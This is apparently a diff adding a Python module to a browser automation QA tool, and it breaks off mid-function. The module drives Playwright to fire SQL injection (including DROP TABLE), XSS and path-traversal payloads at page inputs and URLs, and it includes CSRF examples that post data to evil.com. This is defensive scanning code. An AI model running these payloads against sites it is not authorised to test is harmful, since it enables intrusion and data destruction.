|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Advanced Testing Module
|
| 3 |
+
=================================================================
|
| 4 |
+
|
| 5 |
+
Advanced testing capabilities including security testing, broken URL detection,
|
| 6 |
+
grammatical error checking, and intelligent form testing.
|
| 7 |
+
|
| 8 |
+
Author: Mejbaur Bahar Fagun
|
| 9 |
+
Role: Software Engineer in Test
|
| 10 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 11 |
+
"""
|
| 12 |
+
|
| 13 |
+
import asyncio
|
| 14 |
+
import re
|
| 15 |
+
import random
|
| 16 |
+
import string
|
| 17 |
+
import requests
|
| 18 |
+
from typing import List, Dict, Any, Optional, Tuple
|
| 19 |
+
from playwright.async_api import Page, Locator
|
| 20 |
+
import logging
|
| 21 |
+
from dataclasses import dataclass
|
| 22 |
+
from enum import Enum
|
| 23 |
+
|
| 24 |
+
logger = logging.getLogger(__name__)
|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
class TestType(Enum):
|
| 28 |
+
"""Types of tests that can be performed."""
|
| 29 |
+
SECURITY = "security"
|
| 30 |
+
FUNCTIONALITY = "functionality"
|
| 31 |
+
BROKEN_URL = "broken_url"
|
| 32 |
+
GRAMMAR = "grammar"
|
| 33 |
+
FORM_TESTING = "form_testing"
|
| 34 |
+
PERFORMANCE = "performance"
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
@dataclass
|
| 38 |
+
class TestResult:
|
| 39 |
+
"""Result of a test execution."""
|
| 40 |
+
test_type: TestType
|
| 41 |
+
test_name: str
|
| 42 |
+
status: str # "PASSED", "FAILED", "WARNING"
|
| 43 |
+
description: str
|
| 44 |
+
details: Dict[str, Any]
|
| 45 |
+
recommendations: List[str]
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
class AdvancedTestingEngine:
|
| 49 |
+
"""Advanced testing engine with AI thinking capabilities."""
|
| 50 |
+
|
| 51 |
+
def __init__(self):
|
| 52 |
+
self.test_results: List[TestResult] = []
|
| 53 |
+
self.security_payloads = self._load_security_payloads()
|
| 54 |
+
self.form_test_data = self._load_form_test_data()
|
| 55 |
+
self.grammar_rules = self._load_grammar_rules()
|
| 56 |
+
|
| 57 |
+
def _load_security_payloads(self) -> Dict[str, List[str]]:
|
| 58 |
+
"""Load security testing payloads."""
|
| 59 |
+
return {
|
| 60 |
+
"sql_injection": [
|
| 61 |
+
"' OR '1'='1",
|
| 62 |
+
"'; DROP TABLE users; --",
|
| 63 |
+
"' UNION SELECT * FROM users --",
|
| 64 |
+
"admin'--",
|
| 65 |
+
"admin'/*",
|
| 66 |
+
"' OR 1=1#",
|
| 67 |
+
"' OR 'x'='x",
|
| 68 |
+
"') OR ('1'='1",
|
| 69 |
+
"1' OR '1'='1' AND '1'='1",
|
| 70 |
+
"1' OR '1'='1' LIMIT 1 --"
|
| 71 |
+
],
|
| 72 |
+
"xss": [
|
| 73 |
+
"<script>alert('XSS')</script>",
|
| 74 |
+
"<img src=x onerror=alert('XSS')>",
|
| 75 |
+
"javascript:alert('XSS')",
|
| 76 |
+
"<svg onload=alert('XSS')>",
|
| 77 |
+
"<iframe src=javascript:alert('XSS')></iframe>",
|
| 78 |
+
"<body onload=alert('XSS')>",
|
| 79 |
+
"<input onfocus=alert('XSS') autofocus>",
|
| 80 |
+
"<select onfocus=alert('XSS') autofocus>",
|
| 81 |
+
"<textarea onfocus=alert('XSS') autofocus>",
|
| 82 |
+
"<keygen onfocus=alert('XSS') autofocus>"
|
| 83 |
+
],
|
| 84 |
+
"csrf": [
|
| 85 |
+
"<form action='http://evil.com/steal' method='POST'>",
|
| 86 |
+
"<img src='http://evil.com/steal?data=secret'>",
|
| 87 |
+
"<script>fetch('http://evil.com/steal', {method: 'POST', body: 'data=secret'})</script>"
|
| 88 |
+
],
|
| 89 |
+
"path_traversal": [
|
| 90 |
+
"../../../etc/passwd",
|
| 91 |
+
"..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
|
| 92 |
+
"....//....//....//etc/passwd",
|
| 93 |
+
"..%2F..%2F..%2Fetc%2Fpasswd",
|
| 94 |
+
"..%252F..%252F..%252Fetc%252Fpasswd"
|
| 95 |
+
]
|
| 96 |
+
}
|
| 97 |
+
|
| 98 |
+
def _load_form_test_data(self) -> Dict[str, Dict[str, List[str]]]:
|
| 99 |
+
"""Load comprehensive form test data."""
|
| 100 |
+
return {
|
| 101 |
+
"email": {
|
| 102 |
+
"valid": [
|
| 103 |
+
"test@example.com",
|
| 104 |
+
"user.name@domain.co.uk",
|
| 105 |
+
"admin+test@company.org",
|
| 106 |
+
"valid.email@subdomain.example.com"
|
| 107 |
+
],
|
| 108 |
+
"invalid": [
|
| 109 |
+
"invalid-email",
|
| 110 |
+
"@domain.com",
|
| 111 |
+
"user@",
|
| 112 |
+
"user@domain",
|
| 113 |
+
"user..name@domain.com",
|
| 114 |
+
"user@.domain.com",
|
| 115 |
+
"user@domain..com"
|
| 116 |
+
],
|
| 117 |
+
"edge_cases": [
|
| 118 |
+
"a@b.c",
|
| 119 |
+
"test+tag@example.com",
|
| 120 |
+
"user123@test-domain.com",
|
| 121 |
+
"very.long.email.address@very.long.domain.name.com"
|
| 122 |
+
]
|
| 123 |
+
},
|
| 124 |
+
"password": {
|
| 125 |
+
"valid": [
|
| 126 |
+
"SecurePass123!",
|
| 127 |
+
"MyStr0ng#Password",
|
| 128 |
+
"ComplexP@ssw0rd",
|
| 129 |
+
"Safe123$Password"
|
| 130 |
+
],
|
| 131 |
+
"invalid": [
|
| 132 |
+
"123",
|
| 133 |
+
"password",
|
| 134 |
+
"12345678",
|
| 135 |
+
"qwerty",
|
| 136 |
+
"abc123",
|
| 137 |
+
"Password",
|
| 138 |
+
"password123"
|
| 139 |
+
],
|
| 140 |
+
"edge_cases": [
|
| 141 |
+
"a",
|
| 142 |
+
"a" * 100,
|
| 143 |
+
" ",
|
| 144 |
+
"password with spaces",
|
| 145 |
+
"password\twith\ttabs"
|
| 146 |
+
]
|
| 147 |
+
},
|
| 148 |
+
"phone": {
|
| 149 |
+
"valid": [
|
| 150 |
+
"+1234567890",
|
| 151 |
+
"123-456-7890",
|
| 152 |
+
"(123) 456-7890",
|
| 153 |
+
"+1-234-567-8900",
|
| 154 |
+
"123.456.7890"
|
| 155 |
+
],
|
| 156 |
+
"invalid": [
|
| 157 |
+
"123",
|
| 158 |
+
"abc-def-ghij",
|
| 159 |
+
"123-456-789",
|
| 160 |
+
"+12345678901234567890",
|
| 161 |
+
"123 456 789"
|
| 162 |
+
],
|
| 163 |
+
"edge_cases": [
|
| 164 |
+
"+1-234-567-8900 ext 123",
|
| 165 |
+
"123-456-7890 x123",
|
| 166 |
+
"+1 (234) 567-8900"
|
| 167 |
+
]
|
| 168 |
+
},
|
| 169 |
+
"name": {
|
| 170 |
+
"valid": [
|
| 171 |
+
"John Doe",
|
| 172 |
+
"Mary Jane Smith",
|
| 173 |
+
"José María",
|
| 174 |
+
"李小明",
|
| 175 |
+
"Jean-Pierre"
|
| 176 |
+
],
|
| 177 |
+
"invalid": [
|
| 178 |
+
"123",
|
| 179 |
+
"John123",
|
| 180 |
+
"John@Doe",
|
| 181 |
+
"John<script>",
|
| 182 |
+
""
|
| 183 |
+
],
|
| 184 |
+
"edge_cases": [
|
| 185 |
+
"John O'Connor",
|
| 186 |
+
"Mary-Jane Smith",
|
| 187 |
+
"José María de la Cruz",
|
| 188 |
+
"X Æ A-12"
|
| 189 |
+
]
|
| 190 |
+
},
|
| 191 |
+
"url": {
|
| 192 |
+
"valid": [
|
| 193 |
+
"https://example.com",
|
| 194 |
+
"http://test.org",
|
| 195 |
+
"https://subdomain.example.com/path",
|
| 196 |
+
"https://example.com:8080/path?query=value"
|
| 197 |
+
],
|
| 198 |
+
"invalid": [
|
| 199 |
+
"not-a-url",
|
| 200 |
+
"ftp://example.com",
|
| 201 |
+
"javascript:alert('xss')",
|
| 202 |
+
"data:text/html,<script>alert('xss')</script>"
|
| 203 |
+
],
|
| 204 |
+
"edge_cases": [
|
| 205 |
+
"https://example.com/",
|
| 206 |
+
"https://example.com/path/",
|
| 207 |
+
"https://example.com/path?query=&value=test"
|
| 208 |
+
]
|
| 209 |
+
}
|
| 210 |
+
}
|
| 211 |
+
|
| 212 |
+
def _load_grammar_rules(self) -> Dict[str, List[str]]:
|
| 213 |
+
"""Load grammar checking rules."""
|
| 214 |
+
return {
|
| 215 |
+
"common_errors": [
|
| 216 |
+
r"\b(its|it's)\b", # its vs it's
|
| 217 |
+
r"\b(there|their|they're)\b", # there/their/they're
|
| 218 |
+
r"\b(your|you're)\b", # your vs you're
|
| 219 |
+
r"\b(loose|lose)\b", # loose vs lose
|
| 220 |
+
r"\b(affect|effect)\b", # affect vs effect
|
| 221 |
+
r"\b(than|then)\b", # than vs then
|
| 222 |
+
r"\b(accept|except)\b", # accept vs except
|
| 223 |
+
r"\b(principal|principle)\b", # principal vs principle
|
| 224 |
+
r"\b(compliment|complement)\b", # compliment vs complement
|
| 225 |
+
r"\b(discreet|discrete)\b" # discreet vs discrete
|
| 226 |
+
],
|
| 227 |
+
"punctuation": [
|
| 228 |
+
r"[.!?]\s*[a-z]", # Missing capital after sentence
|
| 229 |
+
r"[a-z][A-Z]", # Missing space between words
|
| 230 |
+
r"\s+", # Multiple spaces
|
| 231 |
+
r"[^\w\s.,!?;:()\"'-]", # Invalid characters
|
| 232 |
+
],
|
| 233 |
+
"spelling": [
|
| 234 |
+
r"\b(recieve|recieved)\b", # receive
|
| 235 |
+
r"\b(seperate|seperated)\b", # separate
|
| 236 |
+
r"\b(definately|defiantly)\b", # definitely
|
| 237 |
+
r"\b(occured|occured)\b", # occurred
|
| 238 |
+
r"\b(neccessary|necesary)\b", # necessary
|
| 239 |
+
r"\b(accomodate|acommodate)\b", # accommodate
|
| 240 |
+
r"\b(embarass|embarras)\b", # embarrass
|
| 241 |
+
r"\b(maintainance|maintenence)\b", # maintenance
|
| 242 |
+
r"\b(priviledge|privilage)\b", # privilege
|
| 243 |
+
r"\b(occassion|ocasion)\b" # occasion
|
| 244 |
+
]
|
| 245 |
+
}
|
| 246 |
+
|
| 247 |
+
async def perform_security_testing(self, page: Page) -> List[TestResult]:
|
| 248 |
+
"""Perform comprehensive security testing."""
|
| 249 |
+
results = []
|
| 250 |
+
|
| 251 |
+
# Test for SQL Injection vulnerabilities
|
| 252 |
+
sql_results = await self._test_sql_injection(page)
|
| 253 |
+
results.extend(sql_results)
|
| 254 |
+
|
| 255 |
+
# Test for XSS vulnerabilities
|
| 256 |
+
xss_results = await self._test_xss_vulnerabilities(page)
|
| 257 |
+
results.extend(xss_results)
|
| 258 |
+
|
| 259 |
+
# Test for CSRF vulnerabilities
|
| 260 |
+
csrf_results = await self._test_csrf_vulnerabilities(page)
|
| 261 |
+
results.extend(csrf_results)
|
| 262 |
+
|
| 263 |
+
# Test for Path Traversal vulnerabilities
|
| 264 |
+
path_traversal_results = await self._test_path_traversal(page)
|
| 265 |
+
results.extend(path_traversal_results)
|
| 266 |
+
|
| 267 |
+
return results
|
| 268 |
+
|
| 269 |
+
async def _test_sql_injection(self, page: Page) -> List[TestResult]:
|
| 270 |
+
"""Test for SQL injection vulnerabilities."""
|
| 271 |
+
results = []
|
| 272 |
+
|
| 273 |
+
try:
|
| 274 |
+
# Find all input fields
|
| 275 |
+
inputs = await page.query_selector_all('input[type="text"], input[type="email"], input[type="password"], textarea')
|
| 276 |
+
|
| 277 |
+
for input_field in inputs:
|
| 278 |
+
for payload in self.security_payloads["sql_injection"]:
|
| 279 |
+
try:
|
| 280 |
+
await input_field.fill(payload)
|
| 281 |
+
await page.keyboard.press('Enter')
|
| 282 |
+
await page.wait_for_timeout(1000)
|
| 283 |
+
|
| 284 |
+
# Check for SQL error messages
|
| 285 |
+
content = await page.content()
|
| 286 |
+
sql_errors = [
|
| 287 |
+
"mysql_fetch_array",
|
| 288 |
+
"ORA-01756",
|
| 289 |
+
"Microsoft OLE DB Provider",
|
| 290 |
+
"SQLServer JDBC Driver",
|
| 291 |
+
"PostgreSQL query failed",
|
| 292 |
+
"Warning: mysql_",
|
| 293 |
+
"valid MySQL result",
|
| 294 |
+
"MySqlClient.",
|
| 295 |
+
"SQL syntax",
|
| 296 |
+
"mysql_num_rows",
|
| 297 |
+
"mysql_query",
|
| 298 |
+
"mysql_fetch_assoc",
|
| 299 |
+
"mysql_fetch_row",
|
| 300 |
+
"mysql_numrows",
|
| 301 |
+
"mysql_close",
|
| 302 |
+
"mysql_connect",
|
| 303 |
+
"mysql_create_db",
|
| 304 |
+
"mysql_data_seek",
|
| 305 |
+
"mysql_db_name",
|
| 306 |
+
"mysql_db_query",
|
| 307 |
+
"mysql_drop_db",
|
| 308 |
+
"mysql_errno",
|
| 309 |
+
"mysql_error",
|
| 310 |
+
"mysql_fetch_array",
|
| 311 |
+
"mysql_fetch_field",
|
| 312 |
+
"mysql_fetch_lengths",
|
| 313 |
+
"mysql_fetch_object",
|
| 314 |
+
"mysql_fetch_result",
|
| 315 |
+
"mysql_field_flags",
|
| 316 |
+
"mysql_field_len",
|
| 317 |
+
"mysql_field_name",
|
| 318 |
+
"mysql_field_seek",
|
| 319 |
+
"mysql_field_table",
|
| 320 |
+
"mysql_field_type",
|
| 321 |
+
"mysql_free_result",
|
| 322 |
+
"mysql_get_client_info",
|
| 323 |
+
"mysql_get_host_info",
|
| 324 |
+
"mysql_get_proto_info",
|
| 325 |
+
"mysql_get_server_info",
|
| 326 |
+
"mysql_info",
|
| 327 |
+
"mysql_insert_id",
|
| 328 |
+
"mysql_list_dbs",
|
| 329 |
+
"mysql_list_fields",
|
| 330 |
+
"mysql_list_processes",
|
| 331 |
+
"mysql_list_tables",
|
| 332 |
+
"mysql_pconnect",
|
| 333 |
+
"mysql_ping",
|
| 334 |
+
"mysql_query",
|
| 335 |
+
"mysql_real_escape_string",
|
| 336 |
+
"mysql_result",
|
| 337 |
+
"mysql_select_db",
|
| 338 |
+
"mysql_stat",
|
| 339 |
+
"mysql_tablename",
|
| 340 |
+
"mysql_thread_id",
|
| 341 |
+
"mysql_unbuffered_query"
|
| 342 |
+
]
|
| 343 |
+
|
| 344 |
+
for error in sql_errors:
|
| 345 |
+
if error.lower() in content.lower():
|
| 346 |
+
results.append(TestResult(
|
| 347 |
+
test_type=TestType.SECURITY,
|
| 348 |
+
test_name="SQL Injection Vulnerability",
|
| 349 |
+
status="FAILED",
|
| 350 |
+
description=f"SQL injection vulnerability detected with payload: {payload}",
|
| 351 |
+
details={
|
| 352 |
+
"payload": payload,
|
| 353 |
+
"error_message": error,
|
| 354 |
+
"input_field": await input_field.get_attribute("name") or "unknown"
|
| 355 |
+
},
|
| 356 |
+
recommendations=[
|
| 357 |
+
"Implement parameterized queries",
|
| 358 |
+
"Use prepared statements",
|
| 359 |
+
"Validate and sanitize all input",
|
| 360 |
+
"Implement proper error handling"
|
| 361 |
+
]
|
| 362 |
+
))
|
| 363 |
+
break
|
| 364 |
+
|
| 365 |
+
# Clear the input for next test
|
| 366 |
+
await input_field.fill("")
|
| 367 |
+
|
| 368 |
+
except Exception as e:
|
| 369 |
+
logger.warning(f"Error testing SQL injection: {e}")
|
| 370 |
+
continue
|
| 371 |
+
|
| 372 |
+
except Exception as e:
|
| 373 |
+
logger.error(f"Error in SQL injection testing: {e}")
|
| 374 |
+
|
| 375 |
+
return results
|
| 376 |
+
|
| 377 |
+
async def _test_xss_vulnerabilities(self, page: Page) -> List[TestResult]:
|
| 378 |
+
"""Test for XSS vulnerabilities."""
|
| 379 |
+
results = []
|
| 380 |
+
|
| 381 |
+
try:
|
| 382 |
+
# Find all input fields
|
| 383 |
+
inputs = await page.query_selector_all('input[type="text"], input[type="email"], input[type="password"], textarea')
|
| 384 |
+
|
| 385 |
+
for input_field in inputs:
|
| 386 |
+
for payload in self.security_payloads["xss"]:
|
| 387 |
+
try:
|
| 388 |
+
await input_field.fill(payload)
|
| 389 |
+
await page.keyboard.press('Enter')
|
| 390 |
+
await page.wait_for_timeout(1000)
|
| 391 |
+
|
| 392 |
+
# Check if the payload is reflected in the page
|
| 393 |
+
content = await page.content()
|
| 394 |
+
if payload in content:
|
| 395 |
+
results.append(TestResult(
|
| 396 |
+
test_type=TestType.SECURITY,
|
| 397 |
+
test_name="XSS Vulnerability",
|
| 398 |
+
status="FAILED",
|
| 399 |
+
description=f"XSS vulnerability detected with payload: {payload}",
|
| 400 |
+
details={
|
| 401 |
+
"payload": payload,
|
| 402 |
+
"input_field": await input_field.get_attribute("name") or "unknown",
|
| 403 |
+
"reflected": True
|
| 404 |
+
},
|
| 405 |
+
recommendations=[
|
| 406 |
+
"Implement proper input validation",
|
| 407 |
+
"Use output encoding",
|
| 408 |
+
"Implement Content Security Policy (CSP)",
|
| 409 |
+
"Sanitize user input before display"
|
| 410 |
+
]
|
| 411 |
+
))
|
| 412 |
+
|
| 413 |
+
# Clear the input for next test
|
| 414 |
+
await input_field.fill("")
|
| 415 |
+
|
| 416 |
+
except Exception as e:
|
| 417 |
+
logger.warning(f"Error testing XSS: {e}")
|
| 418 |
+
continue
|
| 419 |
+
|
| 420 |
+
except Exception as e:
|
| 421 |
+
logger.error(f"Error in XSS testing: {e}")
|
| 422 |
+
|
| 423 |
+
return results
|
| 424 |
+
|
| 425 |
+
async def _test_csrf_vulnerabilities(self, page: Page) -> List[TestResult]:
|
| 426 |
+
"""Test for CSRF vulnerabilities."""
|
| 427 |
+
results = []
|
| 428 |
+
|
| 429 |
+
try:
|
| 430 |
+
# Check for CSRF tokens in forms
|
| 431 |
+
forms = await page.query_selector_all('form')
|
| 432 |
+
|
| 433 |
+
for form in forms:
|
| 434 |
+
csrf_token = await form.query_selector('input[name*="csrf"], input[name*="token"], input[name*="_token"]')
|
| 435 |
+
|
| 436 |
+
if not csrf_token:
|
| 437 |
+
results.append(TestResult(
|
| 438 |
+
test_type=TestType.SECURITY,
|
| 439 |
+
test_name="CSRF Vulnerability",
|
| 440 |
+
status="WARNING",
|
| 441 |
+
description="Form lacks CSRF protection token",
|
| 442 |
+
details={
|
| 443 |
+
"form_action": await form.get_attribute("action") or "unknown",
|
| 444 |
+
"csrf_token_present": False
|
| 445 |
+
},
|
| 446 |
+
recommendations=[
|
| 447 |
+
"Implement CSRF tokens",
|
| 448 |
+
"Use SameSite cookie attribute",
|
| 449 |
+
"Implement proper CSRF protection",
|
| 450 |
+
"Validate origin and referer headers"
|
| 451 |
+
]
|
| 452 |
+
))
|
| 453 |
+
|
| 454 |
+
except Exception as e:
|
| 455 |
+
logger.error(f"Error in CSRF testing: {e}")
|
| 456 |
+
|
| 457 |
+
return results
|
| 458 |
+
|
| 459 |
+
async def _test_path_traversal(self, page: Page) -> List[TestResult]:
|
| 460 |
+
"""Test for path traversal vulnerabilities."""
|
| 461 |
+
results = []
|
| 462 |
+
|
| 463 |
+
try:
|
| 464 |
+
# Test URL parameters for path traversal
|
| 465 |
+
current_url = page.url
|
| 466 |
+
base_url = current_url.split('?')[0]
|
| 467 |
+
|
| 468 |
+
for payload in self.security_payloads["path_traversal"]:
|
| 469 |
+
try:
|
| 470 |
+
test_url = f"{base_url}?file={payload}"
|
| 471 |
+
response = await page.goto(test_url)
|
| 472 |
+
|
| 473 |
+
if response and response.status == 200:
|
| 474 |
+
content = await page.content()
|
| 475 |
+
|
| 476 |
+
# Check for sensitive file content
|
| 477 |
+
sensitive_patterns = [
|
| 478 |
+
"root:",
|
| 479 |
+
"daemon:",
|
| 480 |
+
"bin:",
|
| 481 |
+
"sys:",
|
| 482 |
+
"adm:",
|
| 483 |
+
"tty:",
|
| 484 |
+
"disk:",
|
| 485 |
+
"lp:",
|
| 486 |
+
"mail:",
|
| 487 |
+
"news:",
|
| 488 |
+
"uucp:",
|
| 489 |
+
"man:",
|
| 490 |
+
"proxy:",
|
| 491 |
+
"kmem:",
|
| 492 |
+
"dialout:",
|
| 493 |
+
"fax:",
|
| 494 |
+
"voice:",
|
| 495 |
+
"cdrom:",
|
| 496 |
+
"floppy:",
|
| 497 |
+
"tape:",
|
| 498 |
+
"sudo:",
|
| 499 |
+
"audio:",
|
| 500 |
+
"dip:",
|
| 501 |
+
"www-data:",
|
| 502 |
+
"backup:",
|
| 503 |
+
"operator:",
|
| 504 |
+
"list:",
|
| 505 |
+
"irc:",
|
| 506 |
+
"src:",
|
| 507 |
+
"gnats:",
|
| 508 |
+
"shadow:",
|
| 509 |
+
"utmp:",
|
| 510 |
+
"video:",
|
| 511 |
+
"sasl:",
|
| 512 |
+
"plugdev:",
|
| 513 |
+
"staff:",
|
| 514 |
+
"games:",
|
| 515 |
+
"users:",
|
| 516 |
+
"nogroup:",
|
| 517 |
+
"systemd-journal:",
|
| 518 |
+
"systemd-network:",
|
| 519 |
+
"systemd-resolve:",
|
| 520 |
+
"systemd-timesync:",
|
| 521 |
+
"messagebus:",
|
| 522 |
+
"syslog:",
|
| 523 |
+
"_apt:",
|
| 524 |
+
"tss:",
|
| 525 |
+
"uuidd:",
|
| 526 |
+
"tcpdump:",
|
| 527 |
+
"tty:",
|
| 528 |
+
"landscape:",
|
| 529 |
+
"pollinate:",
|
| 530 |
+
"sshd:",
|
| 531 |
+
"systemd-coredump:",
|
| 532 |
+
"ubuntu:",
|
| 533 |
+
"lxd:",
|
| 534 |
+
"dnsmasq:",
|
| 535 |
+
"libvirt-qemu:",
|
| 536 |
+
"libvirt-dnsmasq:",
|
| 537 |
+
"Debian-exim:",
|
| 538 |
+
"statd:",
|
| 539 |
+
"nobody:",
|
| 540 |
+
"_rpc:",
|
| 541 |
+
"colord:",
|
| 542 |
+
"geoclue:",
|
| 543 |
+
"pulse:",
|
| 544 |
+
"rtkit:",
|
| 545 |
+
"saned:",
|
| 546 |
+
"usbmux:",
|
| 547 |
+
"whoopsie:",
|
| 548 |
+
"kernoops:",
|
| 549 |
+
"speech-dispatcher:",
|
| 550 |
+
"avahi:",
|
| 551 |
+
"samba:",
|
| 552 |
+
"lightdm:",
|
| 553 |
+
"nvidia-persistenced:",
|
| 554 |
+
"cups-pk-helper:",
|
| 555 |
+
"hplip:",
|
| 556 |
+
"gdm:",
|
| 557 |
+
"gnome-initial-setup:",
|
| 558 |
+
"geoclue:",
|
| 559 |
+
"pulse:",
|
| 560 |
+
"rtkit:",
|
| 561 |
+
"saned:",
|
| 562 |
+
"usbmux:",
|
| 563 |
+
"whoopsie:",
|
| 564 |
+
"kernoops:",
|
| 565 |
+
"speech-dispatcher:",
|
| 566 |
+
"avahi:",
|
| 567 |
+
"samba:",
|
| 568 |
+
"lightdm:",
|
| 569 |
+
"nvidia-persistenced:",
|
| 570 |
+
"cups-pk-helper:",
|
| 571 |
+
"hplip:",
|
| 572 |
+
"gdm:",
|
| 573 |
+
"gnome-initial-setup:"
|
| 574 |
+
]
|
| 575 |
+
|
| 576 |
+
for pattern in sensitive_patterns:
|
| 577 |
+
if pattern in content:
|
| 578 |
+
results.append(TestResult(
|
| 579 |
+
test_type=TestType.SECURITY,
|
| 580 |
+
test_name="Path Traversal Vulnerability",
|
| 581 |
+
status="FAILED",
|
| 582 |
+
description=f"Path traversal vulnerability detected with payload: {payload}",
|
| 583 |
+
details={
|
| 584 |
+
"payload": payload,
|
| 585 |
+
"test_url": test_url,
|
| 586 |
+
"sensitive_content": pattern
|
| 587 |
+
},
|
| 588 |
+
recommendations=[
|
| 589 |
+
"Implement proper input validation",
|
| 590 |
+
"Use whitelist approach for file access",
|
| 591 |
+
"Implement proper file path sanitization",
|
| 592 |
+
"Use chroot or similar isolation techniques"
|
| 593 |
+
]
|
| 594 |
+
))
|
| 595 |
+
break
|
| 596 |
+
|
| 597 |
+
await page.goto(current_url) # Return to original page
|
| 598 |
+
|
| 599 |
+
except Exception as e:
|
| 600 |
+
logger.warning(f"Error testing path traversal: {e}")
|
| 601 |
+
continue
|
| 602 |
+
|
| 603 |
+
except Exception as e:
|
| 604 |
+
logger.error(f"Error in path traversal testing: {e}")
|
| 605 |
+
|
| 606 |
+
return results
|
| 607 |
+
|
| 608 |
+
async def check_broken_urls(self, page: Page) -> List[TestResult]:
|
| 609 |
+
"""Check for broken URLs and links."""
|
| 610 |
+
results = []
|
| 611 |
+
|
| 612 |
+
try:
|
| 613 |
+
# Find all links on the page
|
| 614 |
+
links = await page.query_selector_all('a[href]')
|
| 615 |
+
|
| 616 |
+
for link in links:
|
| 617 |
+
href = await link.get_attribute('href')
|
| 618 |
+
if href:
|
| 619 |
+
# Convert relative URLs to absolute
|
| 620 |
+
if href.startswith('/'):
|
| 621 |
+
base_url = f"{page.url.split('/')[0]}//{page.url.split('/')[2]}"
|
| 622 |
+
href = f"{base_url}{href}"
|
| 623 |
+
elif href.startswith('#'):
|
| 624 |
+
continue # Skip anchor links
|
| 625 |
+
elif not href.startswith('http'):
|
| 626 |
+
continue # Skip non-HTTP links
|
| 627 |
+
|
| 628 |
+
try:
|
| 629 |
+
response = requests.get(href, timeout=10, allow_redirects=True)
|
| 630 |
+
|
| 631 |
+
if response.status_code >= 400:
|
| 632 |
+
results.append(TestResult(
|
| 633 |
+
test_type=TestType.BROKEN_URL,
|
| 634 |
+
test_name="Broken URL",
|
| 635 |
+
status="FAILED",
|
| 636 |
+
description=f"Broken URL found: {href}",
|
| 637 |
+
details={
|
| 638 |
+
"url": href,
|
| 639 |
+
"status_code": response.status_code,
|
| 640 |
+
"link_text": await link.inner_text() or "No text"
|
| 641 |
+
},
|
| 642 |
+
recommendations=[
|
| 643 |
+
"Fix the broken URL",
|
| 644 |
+
"Update the link to point to correct page",
|
| 645 |
+
"Implement proper error handling for broken links"
|
| 646 |
+
]
|
| 647 |
+
))
|
| 648 |
+
elif response.status_code >= 300:
|
| 649 |
+
results.append(TestResult(
|
| 650 |
+
test_type=TestType.BROKEN_URL,
|
| 651 |
+
test_name="Redirect URL",
|
| 652 |
+
status="WARNING",
|
| 653 |
+
description=f"URL redirects: {href}",
|
| 654 |
+
details={
|
| 655 |
+
"url": href,
|
| 656 |
+
"status_code": response.status_code,
|
| 657 |
+
"redirect_url": response.url,
|
| 658 |
+
"link_text": await link.inner_text() or "No text"
|
| 659 |
+
},
|
| 660 |
+
recommendations=[
|
| 661 |
+
"Consider updating the link to point directly to final destination",
|
| 662 |
+
"Ensure redirects are working correctly"
|
| 663 |
+
]
|
| 664 |
+
))
|
| 665 |
+
|
| 666 |
+
except requests.exceptions.RequestException as e:
|
| 667 |
+
results.append(TestResult(
|
| 668 |
+
test_type=TestType.BROKEN_URL,
|
| 669 |
+
test_name="Unreachable URL",
|
| 670 |
+
status="FAILED",
|
| 671 |
+
description=f"Unreachable URL: {href}",
|
| 672 |
+
details={
|
| 673 |
+
"url": href,
|
| 674 |
+
"error": str(e),
|
| 675 |
+
"link_text": await link.inner_text() or "No text"
|
| 676 |
+
},
|
| 677 |
+
recommendations=[
|
| 678 |
+
"Check if the URL is correct",
|
| 679 |
+
"Verify the server is accessible",
|
| 680 |
+
"Implement proper error handling"
|
| 681 |
+
]
|
| 682 |
+
))
|
| 683 |
+
|
| 684 |
+
except Exception as e:
|
| 685 |
+
logger.error(f"Error checking broken URLs: {e}")
|
| 686 |
+
|
| 687 |
+
return results
|
| 688 |
+
|
| 689 |
+
async def check_grammatical_errors(self, page: Page) -> List[TestResult]:
|
| 690 |
+
"""Check for grammatical errors in text content."""
|
| 691 |
+
results = []
|
| 692 |
+
|
| 693 |
+
try:
|
| 694 |
+
# Get all text content from the page
|
| 695 |
+
text_elements = await page.query_selector_all('p, h1, h2, h3, h4, h5, h6, span, div, li, td, th')
|
| 696 |
+
|
| 697 |
+
for element in text_elements:
|
| 698 |
+
text = await element.inner_text()
|
| 699 |
+
